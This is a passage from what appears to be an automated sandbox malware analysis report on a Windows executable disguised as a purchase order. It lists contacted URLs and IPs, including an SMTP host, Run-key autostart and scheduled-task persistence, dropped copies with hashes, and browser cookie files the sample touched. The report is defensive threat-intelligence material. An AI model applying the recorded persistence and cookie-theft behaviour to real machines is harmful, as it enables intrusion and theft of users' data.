                                          http://www.fontbureau.com/designers/cabarga.htmlNPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cnPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246623797.0000000005E68000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246680153.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246509021.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/frere-jones.htmlPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.comituLPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://TwQUlE.comjVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.comhPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.founder.com.cn/cne-dPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246680153.0000000005E67000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/Y0-Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.com/designers8Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.jiyu-kobo.co.jp/hPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.comalsPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.comalicPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                162.222.225.16
                                                		unknownUnited States
                                                		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                208.91.198.38
                                                		us2.smtp.mailhostbox.comUnited States
                                                		394695PUBLIC-DOMAIN-REGISTRYUSfalse

                                                Private

                                                IP
                                                192.168.2.1

                                                General Information

                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                Analysis ID:626538
                                                Start date and time: 14/05/202211:35:302022-05-14 11:35:30 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 13m 22s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:Purchase order 450080088 proj. Allt Charnan.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:38
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.adwa.spyw.evad.winEXE@23/16@12/3
                                                EGA Information:
                                                • Successful, ratio: 83.3%
                                                HDC Information:
                                                • Successful, ratio: 1.6% (good quality ratio 1.1%)
                                                • Quality average: 55.9%
                                                • Quality standard deviation: 43%
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Adjust boot time
                                                • Enable AMSI

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                • TCP Packets have been reduced to 100
                                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                • Execution Graph export aborted for target Purchase order 450080088 proj. Allt Charnan.exe, PID 7112 because there are no executed function
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                11:36:39API Interceptor652x Sleep call for process: Purchase order 450080088 proj. Allt Charnan.exe modified
                                                11:36:44API Interceptor32x Sleep call for process: powershell.exe modified
                                                11:36:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run jVULYR C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                11:37:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run jVULYR C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                11:37:09API Interceptor430x Sleep call for process: jVULYR.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASNs

                                                No context

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase order 450080088 proj. Allt Charnan.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):1308
                                                Entropy (8bit):5.345811588615766
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                Malicious:true
                                                Reputation:unknown
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jVULYR.exe.log

                                                Download File
                                                Process:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1308
                                                Entropy (8bit):5.345811588615766
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):22276
                                                Entropy (8bit):5.602944370591129
                                                Encrypted:false
                                                SSDEEP:384:stCDL+0wgSEn7J+0tv+CS0n0jultI+b7Y9gtSJ3xeT1MaXZlbAV787WdO5ZBDI++:F7J+qT0Clth7tc8C+fwIvVU
                                                MD5:ECC0AC3C384575596E261D66E00E67E0
                                                SHA1:6CA2B70139DD3E5167E7FFCC68BD756855235F91
                                                SHA-256:75B4F86BD8FD5A949C7EA84AA61BA8177C4E71A458F2757E8AD5F58EEB15653B
                                                SHA-512:DE5C577BA626CB916866FDA491F1627F1F79204016579902DF3A4EA7F843ADC5A85A2D4AF33EC4B9C4349A389057CFD555558E719FDB41FD07231E4416CDAA05
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:@...e...........y.......h...o.e.b.....X...J..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdklw3ta.cbr.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:1

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tthe0xip.sxn.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:1

                                                C:\Users\user\AppData\Local\Temp\tmp2B32.tmp

                                                Download File
                                                Process:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1595
                                                Entropy (8bit):5.149898447044465
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOtxvn:cge4MYrFdOFzOzN33ODOiDdKrsuT2v
                                                MD5:DD6C0EEF606D484E89572F935B1B7EED
                                                SHA1:D71106AE2D8342235032067DB310DCEA3D81BD7A
                                                SHA-256:C11F85855EE643320520D3E1B797B8CE460F8C019C37EDCC97E3EBCBDD931AFC
                                                SHA-512:1410D7AEA3AE9A66057F05B32B04E1F9A916F13E5CCD2A714A455900370D5F8A75DE4846786FDE270CCCDDB869197596F40B6B9ECB8F1E2497589822382EA46B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

                                                C:\Users\user\AppData\Local\Temp\tmp86F3.tmp

                                                Download File
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1595
                                                Entropy (8bit):5.149898447044465
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOtxvn:cge4MYrFdOFzOzN33ODOiDdKrsuT2v
                                                MD5:DD6C0EEF606D484E89572F935B1B7EED
                                                SHA1:D71106AE2D8342235032067DB310DCEA3D81BD7A
                                                SHA-256:C11F85855EE643320520D3E1B797B8CE460F8C019C37EDCC97E3EBCBDD931AFC
                                                SHA-512:1410D7AEA3AE9A66057F05B32B04E1F9A916F13E5CCD2A714A455900370D5F8A75DE4846786FDE270CCCDDB869197596F40B6B9ECB8F1E2497589822382EA46B
                                                Malicious:true
                                                Reputation:unknown
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

                                                C:\Users\user\AppData\Local\Temp\tmpFBF4.tmp

                                                Download File
                                                Process:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1595
                                                Entropy (8bit):5.149898447044465
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOtxvn:cge4MYrFdOFzOzN33ODOiDdKrsuT2v
                                                MD5:DD6C0EEF606D484E89572F935B1B7EED
                                                SHA1:D71106AE2D8342235032067DB310DCEA3D81BD7A
                                                SHA-256:C11F85855EE643320520D3E1B797B8CE460F8C019C37EDCC97E3EBCBDD931AFC
                                                SHA-512:1410D7AEA3AE9A66057F05B32B04E1F9A916F13E5CCD2A714A455900370D5F8A75DE4846786FDE270CCCDDB869197596F40B6B9ECB8F1E2497589822382EA46B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

                                                C:\Users\user\AppData\Roaming\NpPgfycY.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):677888
                                                Entropy (8bit):7.7510737607081515
                                                Encrypted:false
                                                SSDEEP:12288:TuXha3wv5LRtvlWwlCBYB6xLKWvV+smSe2r5uLd/zUoylGey4:aY05vlRlCBOMLKZSes8d/zlyN
                                                MD5:152EF22896BF39197D210D40171E898A
                                                SHA1:BDD88E03D9131D7F35E0BFADBED02010D231A1BD
                                                SHA-256:5A3834895F08AFF701A029275074D4AB47AFF4951D6F75E8393B0A97CB8F6031
                                                SHA-512:B4648E8C09C4958D80C9F08801D9BD9E3E2651DD194A71DB30D9BA1C84EE448823F97C1550FBD476863046398CAE26E533AA504E7BB297DD53287F52A0D4C928
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 62%
                                                Reputation:unknown
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.~b..............0..P...........n... ........@.. ....................................@..................................n..K...................................*n............................................... ............... ..H............text....N... ...P.................. ..`.rsrc................R..............@..@.reloc...............V..............@..B.................n......H......................h5...6...........................................~....(q...8.....(....8......~....(q...8.....*...0..m.......8".......E........8......*.~......8<....~.........8 ....s......... ....(....9....&8......9....8....8....8........0..........8........E....Q...........&.......w...........+...]...................8L....~.....o..... ....~....(u...o....8.....~.....o..... ....~....(u...o....8.....~.....s....o....8.....~.....o..... ...~....(u...o....8H...~.....s....o.

                                                C:\Users\user\AppData\Roaming\NpPgfycY.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Reputation:unknown
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                C:\Users\user\AppData\Roaming\hsmpeuc1.fpe\Chrome\Default\Cookies

                                                Download File
                                                Process:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                Category:dropped
                                                Size (bytes):20480
                                                Entropy (8bit):0.6970840431455908
                                                Encrypted:false
                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):677888
                                                Entropy (8bit):7.7510737607081515
                                                Encrypted:false
                                                SSDEEP:12288:TuXha3wv5LRtvlWwlCBYB6xLKWvV+smSe2r5uLd/zUoylGey4:aY05vlRlCBOMLKZSes8d/zlyN
                                                MD5:152EF22896BF39197D210D40171E898A
                                                SHA1:BDD88E03D9131D7F35E0BFADBED02010D231A1BD
                                                SHA-256:5A3834895F08AFF701A029275074D4AB47AFF4951D6F75E8393B0A97CB8F6031
                                                SHA-512:B4648E8C09C4958D80C9F08801D9BD9E3E2651DD194A71DB30D9BA1C84EE448823F97C1550FBD476863046398CAE26E533AA504E7BB297DD53287F52A0D4C928
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 62%
                                                Reputation:unknown
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.~b..............0..P...........n... ........@.. ....................................@..................................n..K...................................*n............................................... ............... ..H............text....N... ...P.................. ..`.rsrc................R..............@..@.reloc...............V..............@..B.................n......H......................h5...6...........................................~....(q...8.....(....8......~....(q...8.....*...0..m.......8".......E........8......*.~......8<....~.........8 ....s......... ....(....9....&8......9....8....8....8........0..........8........E....Q...........&.......w...........+...]...................8L....~.....o..... ....~....(u...o....8.....~.....o..... ....~....(u...o....8.....~.....s....o....8.....~.....o..... ...~....(u...o....8H...~.....s....o.

                                                C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Reputation:unknown
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                C:\Users\user\AppData\Roaming\mtx2g3ud.n3c\Chrome\Default\Cookies

                                                Download File
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                Category:modified
                                                Size (bytes):20480
                                                Entropy (8bit):0.6970840431455908
                                                Encrypted:false
                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\Documents\20220514\PowerShell_transcript.035347.wvY4IpFB.20220514113643.txt

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):5781
                                                Entropy (8bit):5.404314265626119
                                                Encrypted:false
                                                SSDEEP:96:BZ3haN1qDo1ZRZMhaN1qDo1ZyV/p3jZShaN1qDo1ZJmHHnZw:lf
                                                MD5:F99E986A7442F13FED06A4728EEF4F0A
